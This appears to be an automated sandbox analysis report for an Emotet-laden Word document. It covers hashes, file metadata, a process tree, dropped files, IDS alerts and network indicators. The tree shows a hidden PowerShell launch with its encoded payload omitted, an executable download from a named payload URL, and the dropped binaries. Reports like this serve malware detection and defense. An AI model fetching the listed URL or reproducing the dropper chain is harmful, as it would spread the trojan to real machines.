Field | Value
---|---
File name | inf Jan 17 20.doc
Full analysis | https://app.any.run/tasks/625eb4ea-67de-4787-826c-ebca5d1a9893
Verdict | Malicious activity
Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.
Analysis date | January 17, 2020, 18:13:10
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags | 
Indicators | 
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Repudiandae., Author: Jules Lefebvre, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 16:30:00 2020, Last Saved Time/Date: Fri Jan 17 16:30:00 2020, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0
MD5 | 656690FC7098AB6403AC9D920BBBAD9D
SHA1 | 34AF857F75D80E4A14E511C1BC2CA94B169675EC
SHA256 | 8DCFD7EF7CACDBB65DB980478C47CBA2D0474A4486B0DC71B16B424BC0741922
SSDEEP | 6144:K00Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+2wywrP:K00E3dxtR/iU9mvUPQwrP
Detected type | .doc, Microsoft Word document (80)
Property | Value
---|---
Title | Repudiandae.
Subject | -
Author | Jules Lefebvre
Keywords | -
Comments | -
Template | Normal.dotm
LastModifiedBy | -
RevisionNumber | 1
Software | Microsoft Office Word
TotalEditTime | -
CreateDate | 2020:01:17 16:30:00
ModifyDate | 2020:01:17 16:30:00
Pages | 1
Words | 3
Characters | 18
Security | None
CodePage | Windows Latin 1 (Western European)
Company | -
Lines | 1
Paragraphs | 1
CharCountWithSpaces | 20
AppVersion | 16
ScaleCrop | No
LinksUpToDate | No
SharedDoc | No
HyperlinksChanged | No
TitleOfParts | -
HeadingPairs | 
CompObjUserTypeLen | 25
CompObjUserType | Microsoft Forms 2.0 Form
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2528 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\inf Jan 17 20.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
2300 | Powershell -w hidden -en [encoded command omitted] | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
584 | "C:\Users\admin\975.exe" | C:\Users\admin\975.exe | — | Powershell.exe | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Exit code: 0; Version: 1, 0, 0, 1
1448 | --1fc0d5f5 | C:\Users\admin\975.exe | | 975.exe | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Exit code: 0; Version: 1, 0, 0, 1
2304 | "C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe" | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | 975.exe | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Exit code: 0; Version: 1, 0, 0, 1
1188 | --d6864438 | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | — | serialfunc.exe | User: admin; Integrity Level: MEDIUM; Description: PromptEdit_Demo MFC Application; Version: 1, 0, 0, 1
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA9F6.tmp.cvr | — | — | —
2528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFA78BC15EDF0CD0CB.TMP | — | — | —
2300 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\61WO4LW86RJJIOXH6P3O.temp | — | — | —
2528 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | AC20989C58B710C022AF4613E7F09FAE | EE88A980AB12DD0D4DD6A91650296F618880EFD04FA13A0D4F75E72F2A85760D
2300 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 6F8C1820F0B071F067DE525E4013643A | 71444B33EED9191FFBFB7BAC166262600AC32E67D681D666E910D5AAB974E2AD
2528 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\inf Jan 17 20.doc.LNK | lnk | 79E3D3A84DF5DDA68600D68ABE692ABE | 0AB65F709C651DB6CCA01B20F220685DFFCD7B8211E3636FA982C37D7A9DC2C3
2300 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39c1d3.TMP | binary | 35375F3D71AE42AA9777154D256B33BF | BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2528 | WINWORD.EXE | C:\Users\admin\Desktop\~$f Jan 17 20.doc | pgc | 97F186F26518F6AB24D6130EAF6D5804 | 9B4868AF97B6F2EE765740B22DA27AD1584AF720D6DF4A52A76CA3F320FEDD0C
1448 | 975.exe | C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe | executable | 3A37758B03500735F82DE9BE3D393A5B | E9E859849A0464CB9793EA05C96F358A364861F29F2DA7AE3E2007ED908E7FAB
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2300 | Powershell.exe | GET | 200 | 149.255.60.174:80 | http://flixz.xyz/wp-admin/IhpywXJaZ/ | GB | executable | 332 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2300 | Powershell.exe | 149.255.60.174:80 | flixz.xyz | Awareness Software Limited | GB | suspicious |
Domain | IP | Reputation
---|---|---
flixz.xyz | | suspicious
PID | Process | Class | Message |
---|---|---|---|
2300 | Powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |
2300 | Powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2300 | Powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2300 | Powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2300 | Powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |